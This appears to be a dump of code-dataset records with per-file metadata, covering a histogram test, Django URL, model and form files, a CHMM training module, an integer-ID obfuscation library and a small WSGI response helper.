hist_gc_perm = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram_no_hessian(0, sample_indices[permutation],
binned_feature, ordered_gradients[permutation],
hist_gc_perm)
hist_ghc_perm = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram(0, sample_indices[permutation], binned_feature,
ordered_gradients[permutation],
ordered_hessians[permutation], hist_ghc_perm)
hist_gc = hist_gc[0]
hist_ghc = hist_ghc[0]
hist_gc_perm = hist_gc_perm[0]
hist_ghc_perm = hist_ghc_perm[0]
assert_allclose(hist_gc['sum_gradients'], hist_gc_perm['sum_gradients'])
assert_array_equal(hist_gc['count'], hist_gc_perm['count'])
assert_allclose(hist_ghc['sum_gradients'], hist_ghc_perm['sum_gradients'])
assert_allclose(hist_ghc['sum_hessians'], hist_ghc_perm['sum_hessians'])
assert_array_equal(hist_ghc['count'], hist_ghc_perm['count'])
@pytest.mark.parametrize("constant_hessian", [True, False])
def test_unrolled_equivalent_to_naive(constant_hessian):
# Make sure the different unrolled histogram computations give the same
# results as the naive one.
rng = np.random.RandomState(42)
n_samples = 10
n_bins = 5
sample_indices = np.arange(n_samples).astype(np.uint32)
binned_feature = rng.randint(0, n_bins - 1, size=n_samples, dtype=np.uint8)
ordered_gradients = rng.randn(n_samples).astype(G_H_DTYPE)
if constant_hessian:
ordered_hessians = np.ones(n_samples, dtype=G_H_DTYPE)
else:
ordered_hessians = rng.lognormal(size=n_samples).astype(G_H_DTYPE)
hist_gc_root = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_ghc_root = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_gc = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_ghc = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_naive = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram_root_no_hessian(0, binned_feature,
ordered_gradients, hist_gc_root)
_build_histogram_root(0, binned_feature, ordered_gradients,
ordered_hessians, hist_ghc_root)
_build_histogram_no_hessian(0, sample_indices, binned_feature,
ordered_gradients, hist_gc)
_build_histogram(0, sample_indices, binned_feature,
ordered_gradients, ordered_hessians, hist_ghc)
_build_histogram_naive(0, sample_indices, binned_feature,
ordered_gradients, ordered_hessians, hist_naive)
hist_naive = hist_naive[0]
hist_gc_root = hist_gc_root[0]
hist_ghc_root = hist_ghc_root[0]
hist_gc = hist_gc[0]
hist_ghc = hist_ghc[0]
for hist in (hist_gc_root, hist_ghc_root, hist_gc, hist_ghc):
assert_array_equal(hist['count'], hist_naive['count'])
assert_allclose(hist['sum_gradients'], hist_naive['sum_gradients'])
for hist in (hist_ghc_root, hist_ghc):
assert_allclose(hist['sum_hessians'], hist_naive['sum_hessians'])
for hist in (hist_gc_root, hist_gc):
assert_array_equal(hist['sum_hessians'], np.zeros(n_bins))
@pytest.mark.parametrize("constant_hessian", [True, False])
def test_hist_subtraction(constant_hessian):
# Make sure the histogram subtraction trick gives the same result as the
# classical method.
rng = np.random.RandomState(42)
n_samples = 10
n_bins = 5
sample_indices = np.arange(n_samples).astype(np.uint32)
binned_feature = rng.randint(0, n_bins - 1, size=n_samples, dtype=np.uint8)
ordered_gradients = rng.randn(n_samples).astype(G_H_DTYPE)
if constant_hessian:
ordered_hessians = np.ones(n_samples, dtype=G_H_DTYPE)
else:
ordered_hessians = rng.lognormal(size=n_samples).astype(G_H_DTYPE)
hist_parent = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
if constant_hessian:
_build_histogram_no_hessian(0, sample_indices, binned_feature,
ordered_gradients, hist_parent)
else:
_build_histogram(0, sample_indices, binned_feature,
ordered_gradients, ordered_hessians, hist_parent)
mask = rng.randint(0, 2, n_samples).astype(np.bool)
sample_indices_left = sample_indices[mask]
ordered_gradients_left = ordered_gradients[mask]
ordered_hessians_left = ordered_hessians[mask]
hist_left = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
if constant_hessian:
_build_histogram_no_hessian(0, sample_indices_left,
binned_feature, ordered_gradients_left,
hist_left)
else:
_build_histogram(0, sample_indices_left, binned_feature,
ordered_gradients_left, ordered_hessians_left,
hist_left)
sample_indices_right = sample_indices[~mask]
ordered_gradients_right = ordered_gradients[~mask]
ordered_hessians_right = ordered_hessians[~mask]
hist_right = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
if constant_hessian:
_build_histogram_no_hessian(0, sample_indices_right,
binned_feature, ordered_gradients_right,
hist_right)
else:
_build_histogram(0, sample_indices_right, binned_feature,
ordered_gradients_right, ordered_hessians_right,
hist_right)
hist_left_sub = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_right_sub = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_subtract_histograms(0, n_bins, hist_parent, hist_right, hist_left_sub)
_subtract_histograms(0, n_bins, hist_parent, hist_left, hist_right_sub)
for key in ('count', 'sum_hessians', 'sum_gradients'):
assert_allclose(hist_left[key], hist_left_sub[key], rtol=1e-6)
assert_allclose(hist_right[key], hist_right_sub[key], rtol=1e-6)
| 44.35468
| 79
| 0.691804
| 0
| 0
| 0
| 0
| 6,359
| 0.706242
| 0
| 0
| 729
| 0.080964
|
c425a78347ab246234b9b4acc34bdb1ab5a3665b
| 349
|
py
|
Python
|
dgpolygon/gmappolygons/urls.py
|
mariohmol/django-google-polygon
|
9d9448e540a4d100d925d7170425143f126e2174
|
[
"MIT"
] | 1
|
2018-04-28T17:06:23.000Z
|
2018-04-28T17:06:23.000Z
|
dgpolygon/gmappolygons/urls.py
|
mariohmol/django-google-polygon
|
9d9448e540a4d100d925d7170425143f126e2174
|
[
"MIT"
] | null | null | null |
dgpolygon/gmappolygons/urls.py
|
mariohmol/django-google-polygon
|
9d9448e540a4d100d925d7170425143f126e2174
|
[
"MIT"
] | null | null | null |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from gmappolygons import views
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^search', views.search, name='search'),
url(r'^submit/$', views.submit, name='submit'),
url(r'^show/(?P<area_id>\d+)/', views.show, name='show'),
)
| 31.727273
| 60
| 0.673352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 84
| 0.240688
|
c4263856e2d9e9e21750aa2037ab8e37b21086eb
| 2,407
|
py
|
Python
|
apps/user/models.py
|
mrf-foundation/ckios_v1
|
3556a99ba5e01f00e137fd124903ace77d2cba28
|
[
"Apache-2.0"
] | null | null | null |
apps/user/models.py
|
mrf-foundation/ckios_v1
|
3556a99ba5e01f00e137fd124903ace77d2cba28
|
[
"Apache-2.0"
] | null | null | null |
apps/user/models.py
|
mrf-foundation/ckios_v1
|
3556a99ba5e01f00e137fd124903ace77d2cba28
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
from django import forms
from django.contrib.auth.models import User
from PIL import Image
from django.utils.timezone import now
class Profile(models.Model):
user = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
image = models.ImageField(upload_to="uploads",default="default/user.png")
def __str__(self):
return f'{self.user.username} Profile'
# Override the save method of the model
def save(self, *args, **kwargs):
super().save()
img = Image.open(self.image.path) # Open image
# resize image
if img.height > 300 or img.width > 300:
output_size = (300, 300)
img.thumbnail(output_size) # Resize image
img.save(self.image.path) # Save it again and override the larger image
## User Update Profile
class UpdateProfileForm(forms.ModelForm):
avatar = forms.ImageField(widget=forms.FileInput(attrs={'class': 'form-control-file'}))
bio = forms.CharField(widget=forms.Textarea(attrs={'class': 'form-control', 'rows': 5}))
website_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
facebook_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
instagram_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
twitter_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
class Meta:
model = Profile
fields = ['avatar', 'bio', 'website_url', 'facebook_url', 'twitter_url', 'instagram_url' ]
class UpdateUserForm(forms.ModelForm):
username = forms.CharField(max_length=100,
required=True,
widget=forms.TextInput(attrs={'class': 'form-control'}))
email = forms.EmailField(required=True,
widget=forms.TextInput(attrs={'class': 'form-control'}))
website_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
facebook_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
instagram_url = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control', 'rows': 1}))
class Meta:
model = User
fields = ['username', 'email', 'instagram_url','facebook_url']
| 44.574074
| 103
| 0.658912
| 2,218
| 0.921479
| 0
| 0
| 0
| 0
| 0
| 0
| 602
| 0.250104
|
c429c3cef7b7daf43f4b36c099ac1e6ca683a4ff
| 19,880
|
py
|
Python
|
slt/chmm/train.py
|
paper-submit-account/Sparse-CHMM
|
8a33dfe375a012cc0cc3324907135b74606a7b5d
|
[
"Apache-2.0"
] | null | null | null |
slt/chmm/train.py
|
paper-submit-account/Sparse-CHMM
|
8a33dfe375a012cc0cc3324907135b74606a7b5d
|
[
"Apache-2.0"
] | null | null | null |
slt/chmm/train.py
|
paper-submit-account/Sparse-CHMM
|
8a33dfe375a012cc0cc3324907135b74606a7b5d
|
[
"Apache-2.0"
] | null | null | null |
import os
import logging
import numpy as np
from typing import Optional
import torch
from torch.utils.data import DataLoader
from ..eval import Metric
from .dataset import CHMMBaseDataset
from .dataset import collate_fn as default_collate_fn
logger = logging.getLogger(__name__)
OUT_RECALL = 0.9
OUT_PRECISION = 0.8
class CHMMBaseTrainer:
def __init__(self,
config,
collate_fn=None,
training_dataset=None,
valid_dataset=None,
test_dataset=None,
pretrain_optimizer=None,
optimizer=None):
self._model = None
self._config = config
self._training_dataset = training_dataset
self._valid_dataset = valid_dataset
self._test_dataset = test_dataset
self._collate_fn = collate_fn
self._pretrain_optimizer = pretrain_optimizer
self._optimizer = optimizer
self._init_state_prior = None
self._init_trans_mat = None
self._init_emiss_mat = None
@property
def config(self):
return self._config
@config.setter
def config(self, x):
logger.warning("Updating DirCHMMTrainer.config")
self._config = x
@property
def model(self):
return self._model
def initialize_trainer(self):
"""
Initialize necessary components for training
Note: Better not change the order
Returns
-------
the initialized trainer
"""
self.initialize_matrices()
self.initialize_model()
self.initialize_optimizers()
return self
def initialize_model(self):
raise NotImplementedError
def initialize_matrices(self):
"""
Initialize <HMM> transition and emission matrices
Returns
-------
self
"""
assert self._training_dataset and self._valid_dataset
# inject prior knowledge about transition and emission
self._init_state_prior = torch.zeros(self._config.d_hidden, device=self._config.device) + 1e-2
self._init_state_prior[0] += 1 - self._init_state_prior.sum()
intg_obs = list(map(np.array, self._training_dataset.obs + self._valid_dataset.obs))
# construct/load initial transition matrix
dataset_dir = os.path.split(self._config.train_path)[0]
transmat_path = os.path.join(dataset_dir, "init_transmat.pt")
if getattr(self._config, "load_init_mat", False):
if os.path.isfile(transmat_path):
logger.info("Loading initial transition matrix from disk")
self._init_trans_mat = torch.load(transmat_path)
# if the loaded transmat does not have the proper shape, re-calculate it.
s0_transmat, s1_transmat = self._init_trans_mat.shape
if not (s0_transmat == s1_transmat == self.config.d_obs):
self._init_trans_mat = None
if self._init_trans_mat is None:
self._init_trans_mat = torch.tensor(initialise_transmat(
observations=intg_obs, label_set=self._config.bio_label_types
)[0], dtype=torch.float)
if getattr(self._config, "save_init_mat", False):
logger.info("Saving initial transition matrix")
torch.save(self._init_trans_mat, transmat_path)
# construct/load initial emission matrix
emissmat_path = os.path.join(dataset_dir, "init_emissmat.pt")
if getattr(self._config, "load_init_mat", False):
if os.path.isfile(emissmat_path):
logger.info("Loading initial emission matrix from disk")
self._init_emiss_mat = torch.load(emissmat_path)
# if the loaded emissmat does not have the proper shape, re-calculate it.
s0_emissmat, s1_emissmat, s2_emissmat = self._init_emiss_mat.shape
if not (s0_emissmat == self.config.n_src) and (s1_emissmat == s2_emissmat == self.config.d_obs):
self._init_emiss_mat = None
if self._init_emiss_mat is None:
self._init_emiss_mat = torch.tensor(initialise_emissions(
observations=intg_obs, label_set=self._config.bio_label_types,
sources=self._config.sources, src_priors=self._config.src_priors
)[0], dtype=torch.float)
if getattr(self._config, "save_init_mat", False):
logger.info("Saving initial emission matrix")
torch.save(self._init_emiss_mat, emissmat_path)
return self
def initialize_optimizers(self, optimizer=None, pretrain_optimizer=None):
self._optimizer = self.get_optimizer() if optimizer is None else optimizer
self._pretrain_optimizer = self.get_pretrain_optimizer() if pretrain_optimizer is None else pretrain_optimizer
def get_dataloader(self, dataset, shuffle=False):
if dataset is not None:
dataloader = DataLoader(
dataset=dataset,
batch_size=self._config.lm_batch_size,
collate_fn=self._collate_fn if self._collate_fn is not None else default_collate_fn,
shuffle=shuffle,
drop_last=False
)
return dataloader
else:
logger.error('Dataset is not defined')
raise ValueError("Dataset is not defined!")
def pretrain_step(self, data_loader, optimizer, trans_, emiss_):
raise NotImplementedError
def training_step(self, data_loader, optimizer):
raise NotImplementedError
def train(self):
raise NotImplementedError
def valid(self) -> Metric:
self._model.to(self._config.device)
valid_metrics = self.evaluate(self._valid_dataset)
logger.info("Validation results:")
for k, v in valid_metrics.items():
logger.info(f" {k}: {v:.4f}")
return valid_metrics
def test(self) -> Metric:
self._model.to(self._config.device)
test_metrics = self.evaluate(self._test_dataset)
logger.info("Test results:")
for k, v in test_metrics.items():
logger.info(f" {k}: {v:.4f}")
return test_metrics
def evaluate(self, dataset: CHMMBaseDataset):
raise NotImplementedError
def predict(self, dataset: CHMMBaseDataset):
raise NotImplementedError
def get_pretrain_optimizer(self):
raise NotImplementedError
def get_optimizer(self):
# ----- initialize optimizer -----
raise NotImplementedError
def save(self,
output_dir: Optional[str] = None,
save_optimizer: Optional[bool] = False,
model_name: Optional[str] = 'chmm',
optimizer_name: Optional[str] = 'chmm-optimizer',
pretrain_optimizer_name: Optional[str] = 'chmm-pretrain-optimizer'):
"""
Save model parameters as well as trainer parameters
Parameters
----------
output_dir: model directory
save_optimizer: whether to save optimizer
model_name: model name (suffix free)
optimizer_name: optimizer name (suffix free)
pretrain_optimizer_name: pretrain optimizer name (suffix free)
Returns
-------
None
"""
output_dir = output_dir if output_dir is not None else self._config.output_dir
logger.info(f"Saving model to {output_dir}")
model_state_dict = self._model.state_dict()
torch.save(model_state_dict, os.path.join(output_dir, f'{model_name}.bin'))
self._config.save(output_dir)
if save_optimizer:
logger.info("Saving optimizer and scheduler")
torch.save(self._optimizer.state_dict(),
os.path.join(output_dir, f"{optimizer_name}.bin"))
torch.save(self._pretrain_optimizer.state_dict(),
os.path.join(output_dir, f"{pretrain_optimizer_name}.bin"))
return None
def load(self,
input_dir: Optional[str] = None,
load_optimizer: Optional[bool] = False,
model_name: Optional[str] = 'chmm',
optimizer_name: Optional[str] = 'chmm-optimizer',
pretrain_optimizer_name: Optional[str] = 'chmm-pretrain-optimizer'):
"""
Load model parameters.
Parameters
----------
input_dir: model directory
load_optimizer: whether load other trainer parameters
model_name: model name (suffix free)
optimizer_name: optimizer name (suffix free)
pretrain_optimizer_name: pretrain optimizer name (suffix free)
Returns
-------
self
"""
input_dir = input_dir if input_dir is not None else self._config.output_dir
if self._model is not None:
logger.warning(f"The original model {type(self._model)} in {type(self)} is not None. "
f"It will be overwritten by the loaded model!")
logger.info(f"Loading model from {input_dir}")
self.initialize_model()
self._model.load_state_dict(torch.load(os.path.join(input_dir, f'{model_name}.bin')))
self._model.to(self.config.device)
if load_optimizer:
logger.info("Loading optimizer and scheduler")
if self._optimizer is None:
self.initialize_optimizers()
if os.path.isfile(os.path.join(input_dir, f"{optimizer_name}.bin")):
self._optimizer.load_state_dict(
torch.load(os.path.join(input_dir, f"{optimizer_name}.bin"), map_location=self.config.device)
)
else:
logger.warning("Optimizer file does not exist!")
if os.path.isfile(os.path.join(input_dir, f"{pretrain_optimizer_name}.bin")):
self._pretrain_optimizer.load_state_dict(
torch.load(os.path.join(input_dir, f"{pretrain_optimizer_name}.bin"))
)
else:
logger.warning("Pretrain optimizer file does not exist!")
return self
def save_results(self,
output_dir: str,
valid_results: Optional[Metric] = None,
file_name: Optional[str] = 'results',
disable_final_valid: Optional[bool] = False,
disable_test: Optional[bool] = False,
disable_inter_results: Optional[bool] = False) -> None:
"""
Save training (validation) results
Parameters
----------
output_dir: output directory, should be a folder
valid_results: validation results during the training process
file_name: file name
disable_final_valid: disable final validation process (getting validation results of the trained model)
disable_test: disable test process
disable_inter_results: do not save inter-results
Returns
-------
None
"""
if not disable_final_valid:
logger.info("Getting final validation metrics")
valid_metrics = self.valid()
else:
valid_metrics = None
if not disable_test:
logger.info("Getting test metrics.")
test_metrics = self.test()
else:
test_metrics = None
# write validation and test results
result_file = os.path.join(output_dir, f'{file_name}.txt')
logger.info(f"Writing results to {result_file}")
self.write_result(file_path=result_file,
valid_results=valid_results,
final_valid_metrics=valid_metrics,
test_metrics=test_metrics)
if not disable_inter_results:
# save validation inter results
logger.info(f"Saving inter results")
inter_result_file = os.path.join(output_dir, f'{file_name}-inter.pt')
torch.save(valid_results.__dict__, inter_result_file)
return None
@staticmethod
def write_result(file_path: str,
valid_results: Optional[Metric] = None,
final_valid_metrics: Optional[Metric] = None,
test_metrics: Optional[Metric] = None) -> None:
"""
Support functions for saving training results
Parameters
----------
file_path: where to save results
valid_results: validation results during the training process
final_valid_metrics: validation results of the trained model
test_metrics
Returns
-------
"""
with open(file_path, 'w') as f:
if valid_results is not None:
for i in range(len(valid_results)):
f.write(f"[Epoch {i + 1}]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {valid_results[k][i]:.4f}")
f.write("\n")
if final_valid_metrics is not None:
f.write(f"[Best Validation]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {final_valid_metrics[k]:.4f}")
f.write("\n")
if test_metrics is not None:
f.write(f"[Test]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {test_metrics[k]:.4f}")
f.write("\n")
return None
def initialise_startprob(observations,
label_set,
src_idx=None):
"""
calculate initial hidden states (not used in our setup since our sequences all begin from
[CLS], which corresponds to hidden state "O".
:param src_idx: source index
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:return: probabilities for the initial hidden states
"""
n_src = observations[0].shape[1]
logger.info("Constructing start distribution prior...")
init_counts = np.zeros((len(label_set),))
if src_idx is not None:
for obs in observations:
init_counts[obs[0, src_idx].argmax()] += 1
else:
for obs in observations:
for z in range(n_src):
init_counts[obs[0, z].argmax()] += 1
for i, label in enumerate(label_set):
if i == 0 or label.startswith("B-"):
init_counts[i] += 1
startprob_prior = init_counts + 1
startprob_ = np.random.dirichlet(init_counts + 1E-10)
return startprob_, startprob_prior
# TODO: try to use a more reliable source to start the transition and emission
def initialise_transmat(observations,
label_set,
src_idx=None):
"""
initialize transition matrix
:param src_idx: the index of the source of which the transition statistics is computed.
If None, use all sources
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:return: initial transition matrix and transition counts
"""
logger.info("Constructing transition matrix prior...")
n_src = observations[0].shape[1]
trans_counts = np.zeros((len(label_set), len(label_set)))
if src_idx is not None:
for obs in observations:
for k in range(0, len(obs) - 1):
trans_counts[obs[k, src_idx].argmax(), obs[k + 1, src_idx].argmax()] += 1
else:
for obs in observations:
for k in range(0, len(obs) - 1):
for z in range(n_src):
trans_counts[obs[k, z].argmax(), obs[k + 1, z].argmax()] += 1
# update transition matrix with prior knowledge
for i, label in enumerate(label_set):
if label.startswith("B-") or label.startswith("I-"):
trans_counts[i, label_set.index("I-" + label[2:])] += 1
elif i == 0 or label.startswith("I-"):
for j, label2 in enumerate(label_set):
if j == 0 or label2.startswith("B-"):
trans_counts[i, j] += 1
transmat_prior = trans_counts + 1
# initialize transition matrix with dirichlet distribution
transmat_ = np.vstack([np.random.dirichlet(trans_counts2 + 1E-10)
for trans_counts2 in trans_counts])
return transmat_, transmat_prior
def initialise_emissions(observations,
label_set,
sources,
src_priors,
strength=1000):
"""
initialize emission matrices
:param sources: source names
:param src_priors: source priors
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:param strength: Don't know what this is for
:return: initial emission matrices and emission counts?
"""
logger.info("Constructing emission probabilities...")
obs_counts = np.zeros((len(sources), len(label_set)), dtype=np.float64)
# extract the total number of observations for each prior
for obs in observations:
obs_counts += obs.sum(axis=0)
for source_index, source in enumerate(sources):
# increase p(O)
obs_counts[source_index, 0] += 1
# increase the "reasonable" observations
for pos_index, pos_label in enumerate(label_set[1:]):
if pos_label[2:] in src_priors[source]:
obs_counts[source_index, pos_index] += 1
# construct probability distribution from counts
obs_probs = obs_counts / (obs_counts.sum(axis=1, keepdims=True) + 1E-3)
# initialize emission matrix
matrix = np.zeros((len(sources), len(label_set), len(label_set)))
for source_index, source in enumerate(sources):
for pos_index, pos_label in enumerate(label_set):
# Simple case: set P(O=x|Y=x) to be the recall
recall = 0
if pos_index == 0:
recall = OUT_RECALL
elif pos_label[2:] in src_priors[source]:
_, recall = src_priors[source][pos_label[2:]]
matrix[source_index, pos_index, pos_index] = recall
for pos_index2, pos_label2 in enumerate(label_set):
if pos_index2 == pos_index:
continue
elif pos_index2 == 0:
precision = OUT_PRECISION
elif pos_label2[2:] in src_priors[source]:
precision, _ = src_priors[source][pos_label2[2:]]
else:
precision = 1.0
# Otherwise, we set the probability to be inversely proportional to the precision
# and the (unconditional) probability of the observation
error_prob = (1 - recall) * (1 - precision) * (0.001 + obs_probs[source_index, pos_index2])
# We increase the probability for boundary errors (i.e. I-ORG -> B-ORG)
if pos_index > 0 and pos_index2 > 0 and pos_label[2:] == pos_label2[2:]:
error_prob *= 5
# We increase the probability for errors with same boundary (i.e. I-ORG -> I-GPE)
if pos_index > 0 and pos_index2 > 0 and pos_label[0] == pos_label2[0]:
error_prob *= 2
matrix[source_index, pos_index, pos_index2] = error_prob
error_indices = [i for i in range(len(label_set)) if i != pos_index]
error_sum = matrix[source_index, pos_index, error_indices].sum()
matrix[source_index, pos_index, error_indices] /= (error_sum / (1 - recall) + 1E-5)
emission_priors = matrix * strength
emission_probs = matrix
return emission_probs, emission_priors
| 38.452611
| 118
| 0.604326
| 13,235
| 0.665744
| 0
| 0
| 1,678
| 0.084406
| 0
| 0
| 5,679
| 0.285664
|
c42c480ac786f98d925a893f66e8658af5b8de1c
| 6,881
|
py
|
Python
|
flask_obfuscateids/lib.py
|
mlenzen/flask-obfuscateids
|
22319633b2685f2969bd67eae3fd09d2db6567f1
|
[
"BSD-3-Clause"
] | null | null | null |
flask_obfuscateids/lib.py
|
mlenzen/flask-obfuscateids
|
22319633b2685f2969bd67eae3fd09d2db6567f1
|
[
"BSD-3-Clause"
] | 1
|
2015-01-26T06:23:12.000Z
|
2015-01-26T06:23:12.000Z
|
flask_obfuscateids/lib.py
|
mlenzen/flask-obfuscateids
|
22319633b2685f2969bd67eae3fd09d2db6567f1
|
[
"BSD-3-Clause"
] | null | null | null |
from random import Random
from collections_extended import setlist
# The version of seeding to use for random
SEED_VERSION = 2
# Common alphabets to use
ALPHANUM = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
BASE58 = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
def shuffle(key, x):
random = Random(key)
random.shuffle(x)
def key_gen(key, base):
'''Generate values from the key.
This will indefinitely generate integers in [0, base).
key is used to initialize random, so that the "random" number generated are
the same each time for a given key. This turns a key of any length into an
"infinitely" long key without simply cycling over the key.
'''
random = Random(key)
while True:
value = random.randint(0, base-1)
yield value
def encode_base_n(num, base, min_length=0):
'''Convert an integer into a list of integers storing the number in base base.
If a minimum length is specified, the result will be 0-padded.
'''
out = []
while num > 0 or len(out) < min_length:
num, remainder = divmod(num, base)
out.append(remainder)
return out
def decode_base_n(int_list, base):
'''Convert a list of numbers representing a number in base base to an integer.'''
out = 0
for index, num in enumerate(int_list):
if num >= base or num < 0:
raise ValueError
out += (base ** index) * num
return out
def calc_check_digits(int_list, base, num_check_chars):
checksum_base = base ** num_check_chars
checksum_value = sum(int_list) % checksum_base
return encode_base_n(checksum_value, base, min_length=num_check_chars)
def add_check_digits(int_list, base, num_check_chars):
'''Calculate a checksum for int_list and translate into a number of base base
made up of num_check_chars digits.
Args:
int_list: A list of integers >= 0 and < base
base: The number of characters in the alphabet
num_check_chars: The number of check characters to return
Returns:
A list of integers that represent the checksum in base base.
'''
check_digits = calc_check_digits(int_list, base, num_check_chars)
return int_list + check_digits
def eval_check_digits(decrypted_ints, base, num_check_chars):
'''Evaluate the check digits in decrypted_ints.
Args:
decrypted_ints: A list of integers >=0 and < base (the result of add_check_digits)
Returns:
The decrypted_ints without the check digits
Raises:
ValueError: if the check digits don't match
'''
if num_check_chars == 0:
return decrypted_ints
int_list = decrypted_ints[:-num_check_chars]
check_digits = decrypted_ints[-num_check_chars:]
if calc_check_digits(int_list, base, num_check_chars) != check_digits:
raise ValueError()
return int_list
def encode(int_list, alphabet):
'''Encode ints using alphabet.'''
char_list = []
for i in int_list:
if i > len(alphabet) or i < 0:
raise ValueError
char_list.append(alphabet[i])
return ''.join(char_list)
def decode(s, alphabet):
'''Decode a string s using alphabet returning a list of ints.'''
try:
return [alphabet.index(c) for c in s]
except (TypeError, IndexError):
raise ValueError
def encrypt(int_list, key, base):
encrypted_ints = []
moving_value = 0
for char_index, key_value in zip(int_list, key_gen(key, base)):
encrypted_int = (char_index + key_value + moving_value) % base
encrypted_ints.append(encrypted_int)
moving_value += encrypted_int
return encrypted_ints
def decrypt(int_list, key, base):
decrypted_ints = []
moving_value = 0
for char_index, key_value in zip(int_list, key_gen(key, base)):
decrypted_int = (char_index - key_value - moving_value) % base
decrypted_ints.append(decrypted_int)
moving_value += char_index
return decrypted_ints
def obfuscate(num, key, alphabet, min_chars=0, num_check_chars=1):
''' Obfuscate num using key.
This does some minor encryption by adding values to a key and a moving value.
The moving value is so that one small change makes all of the resulting
characters change.
Args:
num: The integer to obfuscate
key: An int, string or bytes to generate key values (anything that can be passed to random.seed)
alphabet: A list of characters to use for the alphabet
min_chars: A minimum number of chars for the resulting string
num_check_chars: The number of chars to use as a check
Returns:
A string encoding the number in the passed alphabet and encrypted with key.
Raises:
ValueError: if num is not a number or < 0
'''
try:
if num < 0:
raise ValueError()
except TypeError:
raise ValueError()
base = len(alphabet)
num_as_ints = encode_base_n(num, base, min_chars)
unencrypted_digits = add_check_digits(num_as_ints, base, num_check_chars)
encrypted_digits = encrypt(unencrypted_digits, key, base)
return encode(encrypted_digits, alphabet)
def deobfuscate(s, key, alphabet, num_check_chars=1):
'''Deobfuscate a string using key and alphabet.
key, alphabet and num_check_chars must be identical to the values used to obfuscate.
Args:
s: The string to deobfuscate
key: The key used to obfuscate
alphabet: The alphabet used to obfuscate
num_check_chars: The number of chars to use as a check
Returns:
The deobfuscated integer.
Raises:
ValueError: if s isn't a string, s doesn't use alphabet or the checksum doesn't match
'''
base = len(alphabet)
encrypted_ints = decode(s, alphabet)
decrypted_ints = decrypt(encrypted_ints, key, base)
num_as_ints = eval_check_digits(decrypted_ints, base, num_check_chars)
return decode_base_n(num_as_ints, base)
class Obfuscator():
def __init__(self, key, alphabet=None, min_length=0, num_check_chars=1, version=1):
'''
This accepts a version number in case the algorithm changes at some point
in the future.
Args:
key: The key.
alphabet: Optionally, specify an alternative alphabet to use.
min_length: An encoded value will always be at least min_length
characters (including the check characters)
num_check_chars: The number of chars used for the check
version: The version of the algorithm to use.
'''
if isinstance(num_check_chars, int) and num_check_chars >= 0:
self.num_check_chars = num_check_chars
else:
raise ValueError('num_check_chars must be an int >= 0')
if isinstance(min_length, int) and min_length >= 0:
self.min_length = min_length - num_check_chars
else:
raise ValueError('min_length must be an int >= 0')
self.key = key
alphabet = list(alphabet or ALPHANUM)
shuffle(key, alphabet)
self.alphabet = setlist(alphabet)
def obfuscate(self, num, salt=None, min_length=None):
if salt:
key = self.key + salt
else:
key = self.key
if min_length is None:
min_length = self.min_length
return obfuscate(num, key, self.alphabet, min_length, self.num_check_chars)
def deobfuscate(self, s, salt=None):
if salt:
key = self.key + salt
else:
key = self.key
return deobfuscate(s, key, self.alphabet, self.num_check_chars)
| 30.312775
| 98
| 0.748874
| 1,402
| 0.203749
| 416
| 0.060456
| 0
| 0
| 0
| 0
| 3,031
| 0.440488
|
c42c74470081e712e5a554684e5bb789162adcd2
| 377
|
py
|
Python
|
lib/response.py
|
dpla/akara
|
432f14782152dd19931bdbd8f9fad19b5932426d
|
[
"Apache-2.0"
] | 5
|
2015-01-30T03:50:37.000Z
|
2015-09-23T00:46:11.000Z
|
lib/response.py
|
dpla/akara
|
432f14782152dd19931bdbd8f9fad19b5932426d
|
[
"Apache-2.0"
] | null | null | null |
lib/response.py
|
dpla/akara
|
432f14782152dd19931bdbd8f9fad19b5932426d
|
[
"Apache-2.0"
] | 3
|
2015-03-09T19:16:56.000Z
|
2019-09-19T02:41:29.000Z
|
"""Information for the outgoing response
code - the HTTP response code (default is "200 Ok")
headers - a list of key/value pairs used for the WSGI start_response
"""
code = None
headers = []
def add_header(key, value):
"""Helper function to append (key, value) to the list of response headers"""
headers.append( (key, value) )
# Eventually add cookie support?
| 23.5625
| 80
| 0.700265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 279
| 0.740053
|
c42d5c2686fc626989593bdff74f807903b98683
| 1,594
|
py
|
Python
|
parte 3/desafio93.py
|
BrunoSoares-DEV/Exercicios-python
|
fcfd0a7b3e2c6af2b7dd8e5a15ca6585c97f7c67
|
[
"MIT"
] | 2
|
